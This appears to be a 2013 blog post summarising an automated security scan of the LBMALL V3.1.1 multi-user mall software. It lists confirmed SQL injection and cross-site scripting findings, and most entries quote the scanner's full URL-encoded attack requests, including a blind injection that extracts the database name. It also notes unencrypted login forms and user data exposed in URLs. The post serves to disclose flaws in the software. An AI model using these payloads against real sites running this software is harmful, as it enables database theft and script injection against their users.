
paip. lbmall V3.1.1: summary of security vulnerabilities in the 乐彼 (Lebei) multi-user mall system

September 5, 2013


Author: Attilax, 1466519819@qq.com
Because the account module of my website is implemented with LBMALL V3.1.1, today I specifically scanned it for security vulnerabilities, using HPWI9.

The result: 32 high-risk vulnerabilities were found.

SQL injection (7 vulnerabilities):
---------------------

Critical SQL 盲注(已确认) GET http://localhost/News/List.aspx (Query) tid=0&title=12345'%09OR%09(select%09Ascii(substring(db_name(dbid)%2c2%2c1))%09from%09master..sysprocesses%09where%09spid%3d%40%40SPID)%3c128%09OR%09'4'%3d'0
Critical SQL 注入(已确认)  POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认)  POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认)  POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认)  GET http://localhost/ShopType.aspx (Query) keyword=12345&bprice=12345&eprice=12345%09and%09(select%09count(*)%09from%09spitable)%09%3d%091%09or%091%3d0%09&typeid=&id=1
Critical SQL 注入(已确认)  GET http://localhost/ShopType.aspx (Query) keyword=12345'%09and%09(select%09count(*)%09from%09spitable)%3d1%09or%09'1'%3d'0%09&bprice=12345&eprice=12345&typeid=&id=1
Critical SQL 注入(已确认)  GET http://localhost/ShopType.aspx (Query) typeid=0%09and%09(select%09count(*)%09from%09spitable)%09%3d%091%09or%091%3d0%09&id=1


XSS cross-site scripting (7 vulnerabilities):
---------------------
Critical 跨站点脚本 POST http://localhost/admin/AdminMessage_List.aspx (Post) __VIEWSTATE=%2fwEPDwUJNDg2ODAwMjM5ZGS1Pa6AspCR%2fQg9Erqa8s1q0Oltlw%3d%3d&hid_checkbox=&hid_page=&hid_type=&dateFrom=12345%27%3b%61%6c%65%72%74%28%38%31%36%33%33%29%2f%2f&dateTo=12345&txtSelectInfo=12345...
Critical 跨站点脚本 POST http://localhost/admin/AdminMessage_List.aspx (Post) __VIEWSTATE=%2fwEPDwUJNDg2ODAwMjM5ZGS1Pa6AspCR%2fQg9Erqa8s1q0Oltlw%3d%3d&hid_checkbox=&hid_page=&hid_type=&dateFrom=12345&dateTo=12345%27%3b%61%6c%65%72%74%28%38%31%36%33%33%29%2f%2f&txtSelectInfo=12345...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=1%2c&top=&rec=&arg=&check_=1&hidden_id0=1&txt_title0=titttttt...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&rec=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&top=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&top=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?%22%20%73%54%79%4c%65%3d%58%3a%65%58%2f%2a%...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=%22%20%73%54%79%4c%65%3d%58%3a%65%58%2f%2a%2a%2f%70%52%65%53%73%49%6f%4e%28%61%6c%65%72%74%28%36%34%31%33%34%29%29%20%2...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?%22%20%6f%4e%66%4f%63%55%73%3d%61%6c%65%72%74%28%37%33%35%31%33%29%2...
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?%22%20%6f%4e%66%4f%63%55%73%3d%4d%73%67%42%6f%78%28%35%36%31%32%36%29%20%22&hidden_id2=3&txt_...

Passwords transmitted in cleartext and unencrypted login forms (5 findings)
--------------------------------------------------
High 通过未加密的连接发送登录信息  GET http://localhost/admin/Login.aspx
High 通过未加密的连接发送登录信息  GET http://localhost/Login.aspx (Query) uu=user/Default.aspx
High 通过未加密的连接发送登录信息  GET http://localhost/Login.aspx
High 未加密的登录窗体  GET http://localhost/admin/Login.aspx
High 未加密的登录窗体  GET http://localhost/Login.aspx (Query) uu=user/Default.aspx

Sensitive information exposure via URL / COOKIE / POST (13 findings)
---------------------------------
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Accounta.aspx (Query) uid=20&page=1
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Accounta.aspx (Query) uid=
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) auname=asfda
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) stime=12345&etime=12345&unames=12345&page=1
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/AccountLog.aspx (Query) auname=asfda (Post) __VIEWSTATE=%2fwEPDwUKMTE4MzA5MTAwN2Rk98WeigzHhrAdKMe3%2bv8Gy9tXMtw%3d&txt_starttime=12345&txt_endtime=12345&txt_username=12345&Submit.x=5&Submit.y=5&=26&=25&=24&=23&=22&=21&=20&=19&=18&=1...
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/AccountLog.aspx (Query) auname=asfda (Post) __VIEWSTATE=%2fwEPDwUKMTE4MzA5MTAwN2Rk98WeigzHhrAdKMe3%2bv8Gy9tXMtw%3d&txt_starttime=12345&txt_endtime=12345&txt_username=12345&Submit.x=5&Submit.y=5&=25&=24&=23&=22&=21&=20&=19&=18&=17&=1...
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) auname=asfda&page=2
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Userlist.aspx (Query) usernames=12345&letime=12345&letime2=12345
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Userlist.aspx (Query) usernames=
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/Userlist.aspx (Query) usernames= (Post) __VIEWSTATE=%2fwEPDwUKLTc1MDEzNTU0N2Rki2tGFykf2v4TZF1Ik3esdjZtfhY%3d&txt_starttime=12345&txt_endtime=12345&txt_search=12345
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/Login.aspx (Query) uu=user/Default.aspx
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/Login.aspx
Low “Admin”目录  GET http://localhost/admin/